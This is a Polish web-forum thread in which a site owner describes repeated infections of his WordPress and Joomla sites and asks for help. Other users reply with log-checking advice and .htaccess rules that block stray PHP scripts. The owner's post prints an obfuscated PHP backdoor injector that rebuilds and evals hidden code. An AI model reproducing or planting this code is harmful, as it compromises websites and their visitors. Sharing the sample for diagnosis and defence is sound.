Zabezpieczenie, Ciągłe ataki na strony Opcje

[alarec]

Witam,

Potrzebuje pomocy, bo już nie wiem co robić (IMG:style_emoticons/default/sad.gif)
Na serwerze mam kilka stron opartych o CMS'y wordpress i joomla.

Zaczęło się od ataków na wordpress'a $zend_framework, ale stworzyłem sobie skrypcik, który automatycznie usuwał linijkę za to odpowedzialną.
Potem zaczęło się jeszcze gorzej, bo w pierwszej linijce pojawiały się losowe nazwy zmiennych, co znacznie utrudnia odszukiwanie takich lijek przez mój skrypt.
Byly 2 z zend_framework, oraz 2 ataki z losowymi zmiennymi.
Ostatnio gniazdo zostało wytępione, wszystkie pliki wyleczone, zmienone hasla do baz danych, do kont FTP, do CMS'ów, do serwera. Był spokój na 2 tygodnie - dzisiaj znowu wszystkie CMSy zostały zaatakowane.

Nie mam pojęcia jak się zabezpieczać przed takim atakiem... pomóżcie koledzy

Poniżej skrócony kod, który jest wklejany:

[PHP] pobierz, plaintext 
$qcvqglgvmw = '57%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#5c%x7824-!%x5c%x7825%x5c%x78247827u%x5c%x7825)7fmji%x5c%x78A%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78878:<##(IMG:style_emoticons/default/snitch.gif) :h%x5c%x7825:<#64y]552x5c%x7825tjw!>!#]y84]275]y83]248]y83]256x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4Pcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x78275c%x7827;mnui}&;zepc}A;%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps7825!|!*!***b%x5c%x7825)sf%xOJ%x5c%x7860GB)fubfsdXA%x5c%!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%1x7825)!gj!~<ofmy%x5c%x7825,2%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%1MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%51%x29%51%x29%73", NULL); }%x78246767~6<Cw6<pd%x5c%x7825w6Z6%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!25%x5c%x785cSFWSFT%x5c%#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-5-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3ox5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x797e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]8M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c85cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x78225h>#]y31]278]y3e]81]K78:56985:6197g:749uofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufl6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjx5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x786{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjud8]37]278]225]241]334]gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x780hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UF!>!#]y3d]51]y35]256]y76]72]y3-%x5c%x7825tmw)%x5c%x78-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y/(.*)/epreg_replaceryrxpqnhpj'; $acjankkbsy = explode(chr((171-127)),'3711,60,8426,62,8077,33,2831,45,757,33,8515,53,0,55,6936,39,338,37,1695,60,2994,
65,8637,33,9642,67,9840,66,2773,58,5128,41,988,40,3912,60,1642,53,139,29,3084,54,
2943,23,7873,60,649,41,9906,60,9966,49,8398,28,3512,33,5533,28,6369,31,2966,28,49
7,33,7109,55,6975,27,3859,53,7933,43,9177,69,4229,45,7164,53,9353,53,168,41,7575,
46,5561,65,6824,47,6320,49,4963,25,8568,41,375,55,7621,55,1194,20,3831,28,9286,67
,5783,69,877,60,4340,52,2158,25,4552,67,4071,59,8798,68,4658,33,3402,50,5885,23,5
354,53,2110,48,8488,27,7769,63,8237,51,6725,59,6628,32,5908,44,9709,56,7832,41,86
70,48,1755,44,3595,20,1799,27,2183,41,3186,63,9591,51,454,43,266,48,7676,62,6182,
51,1498,24,8370,28,430,24,2704,69,4777,44,7738,31,7441,23,5716,67,7002,60,2384,56
,2534,35,7976,31,6233,23,2465,69,4988,54,8934,36,5042,27,6017,50,8718,23,6660,65,
4482,70,1826,32,3972,41,6784,40,5952,65,6455,65,7344,58,9786,54,2638,25,5069,39,1
128,66,1088,40,3545,50,3365,37,5194,64,1858,68,9531,60,8288,23,3615,41,838,39,152
2,37,2224,68,583,66,5108,20,7402,39,6431,24,8152,42,4274,66,8110,42,5684,32,5473,
60,7217,59,4619,39,7062,47,937,51,8970,47,209,57,1331,55,2876,67,5258,52,790,48,1
601,41,1214,65,109,30,8007,70,7276,68,8741,57,2663,41,6594,34,530,53,3452,60,314,
24,4900,63,5852,33,3771,60,9406,68,10015,29,2320,64,6520,53,4184,45,8866,68,6400,
31,2440,25,4130,54,2569,69,4412,70,1386,47,10044,23,6067,60,9246,40,4691,30,9017,
64,1926,69,5310,44,3656,55,4842,58,690,67,2064,46,1995,69,4821,21,6573,21,3059,25
,8194,43,9765,21,2292,28,1279,52,4721,56,3311,54,3249,62,5169,25,8311,59,1559,42,
6127,55,4392,20,5407,66,5626,58,4013,58,1433,65,3138,48,9137,40,6871,65,55,54,100
67,39,1028,60,9081,56,9474,57,7464,64,6256,64,7528,47,8609,28'); $fepgzvwjbr=substr($qcvqglgvmw,(43726-33620),(27-20)); if (!function_exists('bbetuzolvq')) { function bbetuzolvq($yvcqviliej, $ikvxdzewqn) { $zczkvuywek = NULL; for($wulbucfysh=0;$wulbucfysh<(sizeof($yvcqviliej)/2);$wulbucfysh++) { $zczkvuywek .= substr($ikvxdzewqn, $yvcqviliej[($wulbucfysh*2)],$yvcqviliej[($wulbucfysh*2)+1]); } return $zczkvuywek; };} $bfdlbnqmmq="\x20\57\x2a\40\x68\142\x7a\156\x61\163\x6c\145\x6f\164\x20\52\x2f\40\x65\16
6\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\
x32\60\x31\55\x31\66\x34\51\x29\54\x20\143\x68\162\x28\50\x33\65\x39\55\x32\66\x3
7\51\x29\54\x20\142\x62\145\x74\165\x7a\157\x6c\166\x71\50\x24\141\x63\152\x61\15
6\x6b\153\x62\163\x79\54\x24\161\x63\166\x71\147\x6c\147\x76\155\x77\51\x29\51\x3
b\40\x2f\52\x20\165\x72\157\x71\166\x74\156\x66\145\x66\40\x2a\57\x20"; $fqucnrhpxk=substr($qcvqglgvmw,(66061-55948),(69-57)); $fqucnrhpxk($fepgzvwjbr, $bfdlbnqmmq, NULL); $fqucnrhpxk=$bfdlbnqmmq; $fqucnrhpxk=(779-658); $qcvqglgvmw=$fqucnrhpxk-1;
[PHP] pobierz, plaintext 

[ctom]

popatrz kiedy były modyfikowane te pliki w "wkładką" i szukaj w logach któredy się ktoś dobiera Ci do ... (serwera) .

[zegarek84]

przecież w joomli wystarczy Ci dostęp tylko do 2 plików php - mi nie chciało się aktualizować strony którą kolega się zajmuje a ja tylko jak coś się psuło, nie chciało mi się szukać backdorów którędy i jak wgrywali te pliki którymi dalej robili szkody... po prostu na joomli dopisałem regułkę w .htaccess w stylu:

Kod

##### Begin - zegarek84
# blokada skryptów php innych niż /index.php i /administrator/index.php
# blokada wyświetlania katalogów i plików index.html znajdujących się w nim by po strukturze nie rozpoznać iż to Joomla
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^/?(?!(?:administrator/)?index\.php).+\.php$ - [F,L]
# przeglądanie bezpośrednie katalogów z wyjątkiem głównego i administrator zabronione
RewriteCond %{REQUEST_FILENAME} -d
RewriteCond %{REQUEST_URI} !^/?(?:administrator/?)?$ [NC]
RewriteRule .* - [F,L]

RewriteRule /index\.html?$ - [NC,F,L]

##### End - zegarek84

tak na prawdę to jak strona jest popularna to po prostu ataki są z reguły przez roboty sieciowe wykonujące standardowe operacje po rozpoznaniu cms'a, więc info w kodzie nie podaj w tagach meta + rozpoznać cms'a można po adresach oraz typowych akcjach...

swoją drogą po blokadzie wszystkich skryptów php oprócz wejściowych jest spokój na jakiś czas ;] - co nie zmienia faktu, że lepiej backup robić ;] - ale ile syfu już wgrali którego nie można uruchomić ^^ - tylko nie mam czasu tego przeglądać bo niektóre skrypciki wyglądają ciekawie ;D

[alarec]

Znalazłem jakiś plik, który program antywirusowy mi wykrył, plik był na serwerze i miał rozszerzenie .php - nie dało się go otworzyć w edytorze tekstu.
Narazie spróbuje tej plokady plików, i usunę metatagi z generatorem.
Strona jest dość popularna na całym świecie, więc nie dziwie się że są częste ataki.